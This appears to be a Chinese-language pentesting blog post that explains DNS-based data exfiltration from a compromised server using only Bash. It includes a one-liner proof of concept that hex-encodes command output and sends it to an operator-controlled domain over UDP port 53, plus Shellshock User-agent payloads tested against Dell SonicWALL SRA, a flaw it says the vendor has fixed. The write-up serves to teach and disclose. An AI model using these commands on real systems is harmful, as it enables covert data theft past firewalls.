在渗透测试过程中，拿到服务器权限之后从服务器下载数据是一件比较费劲的事情，因为服务器一般都有防火墙在前面挡着。防火墙一般都会禁止服务器对外建立连接，这种情况下使用DNS来下载数据是一种行之有效的方法，因为防火墙一般不会禁止对外的DNS查询，本文中作者将根据一个具体的实例来讲解这个方法。

　　原理简述？？

　　其实已经有一些方法可以搞定这件事情，来将服务器上的数据拖出来，但是存在的问题是，这些既有的方法都需要借助一些Linux上的软件，而有时候并不是所有环境中都装了这些软件。比如我常用A软件来拖数据，但是如果遇到一台服务器上没有这软件，就白瞎了。所以，本文中使用BASH本身的功能来达到这一目的——通用、好用。

　　下面的代码就是 POC：

　　LINE=`id`； domain="yourdomain.com"；while read -r -n 1 char；

　　do var+=$(printf "%X" '$char')；done<<<$LINE；b=0；e=60；l=${#var}；

　　while [ $b -lt $l ]；do >& /dev/udp/$RANDOM.$b."${var：$b：$e}".

　　$domain/53 0>&1；let b=b+60；done；>& /dev/udp/$RANDOM.theend.$domain/53

　　0>&1；unset var；unset var2

　　将上面的 domain 改为你自己的 DNS 服务器地址，LINE 是要执行的系统命令，比如上例中是查看当前id，domain指向你自己的server 地址，用来接受数据。在你自己的 server 上运行下面这段 ruby 脚本：

　　dns.rb

　　这段脚本用来获取数据，比如执行下面这段脚本：

　　在自己的机器上接受到的数据如下：

　　显然这是一个行之有效的方法，但是，如果你遇到什么问题，可以直接找[原博]跟作者交流。

　　一个实际案例

　　？？之前我发现Dell SonicWALL Secure Remote Access (SRA)系列软件有Shellshock漏洞，当在http header中携带下面这样的ua ，server返回的是200 ：？？

　　User-agent： () { ：； }； /bin/ls

　　但是如果提交包含如下User-agent的请求，server端返回 500 错误：

　　User-agent： () { ：； }； /bin/fake

　　当然也可以用下面的User-agent的请求确定，这套软件确实有漏洞：

　　User-agent： () { ：； }； /bin/sleep 60

　　现在问题来了，在这种情况下，我只能执行命令，却无法得到回显，我尝试了所有对外的链接，都被 server 禁止了，只有 DNS 可以用，可以用 telnet 来发起 DNS 请求。在这种情况下，上面我给出的 POC 就变得很有用了，并且非常隐蔽。

　　其他

　　目前Dell已经修复了这个漏洞，相关信息见：

　　https：//support.software.dell.com/product-notification/133206？productName=SonicWALL%20SRA%20Series